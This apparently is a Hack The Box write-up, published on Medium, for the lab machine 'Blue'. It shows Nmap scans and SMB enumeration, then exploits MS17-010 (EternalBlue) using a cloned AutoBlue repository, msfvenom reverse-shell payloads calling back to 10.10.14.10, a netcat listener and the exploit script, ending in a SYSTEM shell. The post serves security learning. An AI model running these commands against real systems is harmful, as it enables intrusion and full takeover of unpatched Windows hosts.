Hack The Box: Blue Write-up (#30)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.40
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 139: — Running netbios-ssn service
  • Port 445: — Running samba service
  • Port 135,49152,49153,49154,49155,49156,49157: — Running Windows RPC
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.0099s latency).
Scanned at 2020-08-29 18:17:03 +08 for 111s
Not shown: 65526 closed ports
Reason: 65526 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
...SNIP...
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26781/tcp): CLEAN (Couldn't connect)
| Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19006/udp): CLEAN (Failed to receive data)
| Check 4 (port 60195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:18:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-29T10:18:51
|_ start_date: 2020-08-29T10:16:53
...
nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.40
  • -sU: UDP scan
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-29 18:17:03 +08 for 329s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 127
67/udp closed dhcps port-unreach ttl 127
68/udp closed dhcpc port-unreach ttl 127
69/udp closed tftp port-unreach ttl 127
123/udp closed ntp port-unreach ttl 127
135/udp closed msrpc port-unreach ttl 127
137/udp open|filtered netbios-ns no-response
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 127
161/udp closed snmp port-unreach ttl 127
162/udp closed snmptrap port-unreach ttl 127
445/udp closed microsoft-ds port-unreach ttl 127
500/udp open|filtered isakmp no-response
|_ike-version: ERROR: Script execution failed (use -d to debug)
514/udp closed syslog port-unreach ttl 127
520/udp closed route port-unreach ttl 127
631/udp closed ipp port-unreach ttl 127
1434/udp closed ms-sql-m port-unreach ttl 127
1900/udp closed upnp port-unreach ttl 127
4500/udp open|filtered nat-t-ike no-response
49152/udp closed unknown port-unreach ttl 127
Too many fingerprints match this host to give specific OS details
...

Service Enumeration

nmap --script smb-vuln* -p139,445 -oA smb-vuln-scan.nmap 10.10.10.40
Nmap SMB vuln scan
nmap --script smb-os-discovery -p139,445 -oA OS-Discobvery 10.10.10.40
...SNIP...
Nmap scan report for 10.10.10.40
Host is up (0.0086s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-29T11:21:56+01:00

Exploitation

  1. Download exploit code from GitHub.
  2. Create MSFvenom reverse shell payload.
  3. Run the exploit.
git clone https://github.com/lokendrasinghrawat/AutoBlue-MS17-010.git
root@kali:/opt/AutoBlue-MS17-010/shellcode# ./shell_prep.sh
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
LHOST for reverse connection:
10.10.14.10
LPORT you want x64 to listen on:
53
LPORT you want x86 to listen on:
8080
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=53
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.10 LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONE
nc -nlvp 53
root@kali:/opt/AutoBlue-MS17-010# pwd
/opt/AutoBlue-MS17-010
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_x64.bin
SYSTEM reverse shell
user.txt flag
root.txt flag

Attack Strategy Map

Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

47 Followers

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.